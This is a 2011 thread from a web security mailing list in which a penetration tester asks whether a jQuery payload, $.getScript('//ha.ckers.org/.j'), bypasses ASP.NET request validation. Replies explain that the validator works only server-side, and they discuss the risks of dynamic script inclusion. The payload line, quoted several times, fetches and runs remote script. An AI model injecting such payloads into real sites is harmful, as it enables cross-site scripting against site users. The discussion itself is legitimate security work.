Hi, Recently on a client test I was able to bypass the ASP.NET Request Validator by leveraging the jQuery library which was included in the page. I am mainly a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal. I was wondering if any one could confirm whether my bypass affects all ASP.NET installations or whether or not this particular client had it configured incorrectly. I used the following jQuery function to bypass the filter: $.getScript('//ha.ckers.org/.j'); Thanks, Ryan Ryan Dewhurst blog www.ethicalhack3r.co.uk projects www.dvwa.co.uk | www.webwordcount.com twitter www.twitter.com/ethicalhack3r

If this jQuery .getScript request is only performed client-side, then it wouldn't even be sent to the server-side ASP.NET XSS validation to be bypassed. Date: Sat, 19 Feb 2011 15:39:06 +0000 From: ryandewhurst@gmail.com To: websecurity@webappsec.org Subject: [WEB SECURITY] ASP.NET Request Validator Bypass? Hi, Recently on a client test I was able to bypass the ASP.NET Request Validator by leveraging the jQuery library which was included in the page. I am mainly a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal. I was wondering if any one could confirm whether my bypass affects all ASP.NET installations or whether or not this particular client had it configured incorrectly. I used the following jQuery function to bypass the filter: $.getScript('//ha.ckers.org/.j'); Thanks, Ryan Ryan Dewhurst blog www.ethicalhack3r.co.uk projects www.dvwa.co.uk | www.webwordcount.com twitter www.twitter.com/ethicalhack3r _______________________________________________ The Web Security Mailing List WebSecurity RSS Feed http://www.webappsec.org/rss/websecurity.rss Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA WASC on Twitter http://twitter.com/wascupdates websecurity@lists.webappsec.org http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org

Exactly. ASP.NET requestValidators are a server-side control. jquery getScript is designed to be used client-side and fetch a script to build or interface with the DOM. Therefore the server side controls would never see it. --- Arian Evans On Sat, Feb 19, 2011 at 10:04 AM, steve jensen <sjensen1207@hotmail.com> wrote: > If this jQuery .getScript request is only performed client-side, then it > wouldn't even be sent to the server-side ASP.NET XSS validation to be > bypassed. > > ________________________________ > Date: Sat, 19 Feb 2011 15:39:06 +0000 > From: ryandewhurst@gmail.com > To: websecurity@webappsec.org > Subject: [WEB SECURITY] ASP.NET Request Validator Bypass? > > Hi, > > Recently on a client test I was able to bypass the ASP.NET Request Validator > by leveraging the jQuery library which was included in the page. I am mainly > a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal. > > I was wondering if any one could confirm whether my bypass affects all > ASP.NET installations or whether or not this particular client had it > configured incorrectly. > > I used the following jQuery function to bypass the filter: > $.getScript('//ha.ckers.org/.j'); > > Thanks, > Ryan > > Ryan Dewhurst > > blog www.ethicalhack3r.co.uk > projects www.dvwa.co.uk | www.webwordcount.com > twitter www.twitter.com/ethicalhack3r > > _______________________________________________ The Web Security Mailing > List WebSecurity RSS Feed http://www.webappsec.org/rss/websecurity.rss Join > WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA WASC on > Twitter http://twitter.com/wascupdates websecurity@lists.webappsec.org > http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org > _______________________________________________ > The Web Security Mailing List > > WebSecurity RSS Feed > http://www.webappsec.org/rss/websecurity.rss > > Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA > > WASC on Twitter > http://twitter.com/wascupdates > > websecurity@lists.webappsec.org > http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org > >

Gotta love this sort of thing though right? As websites keep using and building upon these types of libs at some point we'll start to figure out the equivalent of "return to libc"-ish attacks for web apps. - Tasos On 02/19/2011 09:52 PM, Arian J. Evans wrote: > Exactly. ASP.NET requestValidators are a server-side control. > > jquery getScript is designed to be used client-side and fetch a script > to build or interface with the DOM. Therefore the server side controls > would never see it. > > --- > Arian Evans > > > > On Sat, Feb 19, 2011 at 10:04 AM, steve jensen<sjensen1207@hotmail.com> wrote: >> If this jQuery .getScript request is only performed client-side, then it >> wouldn't even be sent to the server-side ASP.NET XSS validation to be >> bypassed. >> >> ________________________________ >> Date: Sat, 19 Feb 2011 15:39:06 +0000 >> From: ryandewhurst@gmail.com >> To: websecurity@webappsec.org >> Subject: [WEB SECURITY] ASP.NET Request Validator Bypass? >> >> Hi, >> >> Recently on a client test I was able to bypass the ASP.NET Request Validator >> by leveraging the jQuery library which was included in the page. I am mainly >> a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal. >> >> I was wondering if any one could confirm whether my bypass affects all >> ASP.NET installations or whether or not this particular client had it >> configured incorrectly. >> >> I used the following jQuery function to bypass the filter: >> $.getScript('//ha.ckers.org/.j'); >> >> Thanks, >> Ryan >> >> Ryan Dewhurst >> >> blog www.ethicalhack3r.co.uk >> projects www.dvwa.co.uk | www.webwordcount.com >> twitter www.twitter.com/ethicalhack3r >> >> _______________________________________________ The Web Security Mailing >> List WebSecurity RSS Feed http://www.webappsec.org/rss/websecurity.rss Join >> WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA WASC on >> Twitter http://twitter.com/wascupdates websecurity@lists.webappsec.org >> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org >> _______________________________________________ >> The Web Security Mailing List >> >> WebSecurity RSS Feed >> http://www.webappsec.org/rss/websecurity.rss >> >> Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA >> >> WASC on Twitter >> http://twitter.com/wascupdates >> >> websecurity@lists.webappsec.org >> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org >> >> > > _______________________________________________ > The Web Security Mailing List > > WebSecurity RSS Feed > http://www.webappsec.org/rss/websecurity.rss > > Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA > > WASC on Twitter > http://twitter.com/wascupdates > > websecurity@lists.webappsec.org > http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org >

On Sat, Feb 19, 2011 at 3:39 PM, Tasos Laskos <tasos.laskos@gmail.com> wrote: > Gotta love this sort of thing though right? > As websites keep using and building upon these types of libs at some point > we'll start to figure out the equivalent of "return to libc"-ish attacks for > web apps. Ha! I am seeing this type of challenge grow, rapidly. We have even been the victim of this at WhiteHat Security. Jeremiah Grossman has blogged about the challenges in measuring this scenario, and I'm planning a longer blog post about managing it. The thing about these dynamic getScript type functions is that you can literally be secure one day, and *exploitable* the next. Managing requires daily and constant ongoing measurement - given that these functions are dynamic and have zero notion of change control. e.g.-you cannot specify a version of a script or reference a binary checksum, etc. etc. to ensure you are only including code you have previously verified and approved. Fun mess! --- Arian Evans Spectacular Script Sourcing Skills > > - Tasos > > On 02/19/2011 09:52 PM, Arian J. Evans wrote: >> >> Exactly. ASP.NET requestValidators are a server-side control. >> >> jquery getScript is designed to be used client-side and fetch a script >> to build or interface with the DOM. Therefore the server side controls >> would never see it. >> >> --- >> Arian Evans >> >> >> >> On Sat, Feb 19, 2011 at 10:04 AM, steve jensen<sjensen1207@hotmail.com> >>  wrote: >>> >>> If this jQuery .getScript request is only performed client-side, then it >>> wouldn't even be sent to the server-side ASP.NET XSS validation to be >>> bypassed. >>> >>> ________________________________ >>> Date: Sat, 19 Feb 2011 15:39:06 +0000 >>> From: ryandewhurst@gmail.com >>> To: websecurity@webappsec.org >>> Subject: [WEB SECURITY] ASP.NET Request Validator Bypass? >>> >>> Hi, >>> >>> Recently on a client test I was able to bypass the ASP.NET Request >>> Validator >>> by leveraging the jQuery library which was included in the page. I am >>> mainly >>> a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal. >>> >>> I was wondering if any one could confirm whether my bypass affects all >>> ASP.NET installations or whether or not this particular client had it >>> configured incorrectly. >>> >>> I used the following jQuery function to bypass the filter: >>> $.getScript('//ha.ckers.org/.j'); >>> >>> Thanks, >>> Ryan >>> >>> Ryan Dewhurst >>> >>> blog www.ethicalhack3r.co.uk >>> projects www.dvwa.co.uk | www.webwordcount.com >>> twitter www.twitter.com/ethicalhack3r >>> >>> _______________________________________________ The Web Security Mailing >>> List WebSecurity RSS Feed http://www.webappsec.org/rss/websecurity.rss >>> Join >>> WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA WASC on >>> Twitter http://twitter.com/wascupdates websecurity@lists.webappsec.org >>> >>> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org >>> _______________________________________________ >>> The Web Security Mailing List >>> >>> WebSecurity RSS Feed >>> http://www.webappsec.org/rss/websecurity.rss >>> >>> Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA >>> >>> WASC on Twitter >>> http://twitter.com/wascupdates >>> >>> websecurity@lists.webappsec.org >>> >>> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org >>> >>> >> >> _______________________________________________ >> The Web Security Mailing List >> >> WebSecurity RSS Feed >> http://www.webappsec.org/rss/websecurity.rss >> >> Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA >> >> WASC on Twitter >> http://twitter.com/wascupdates >> >> websecurity@lists.webappsec.org >> >> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org >> > >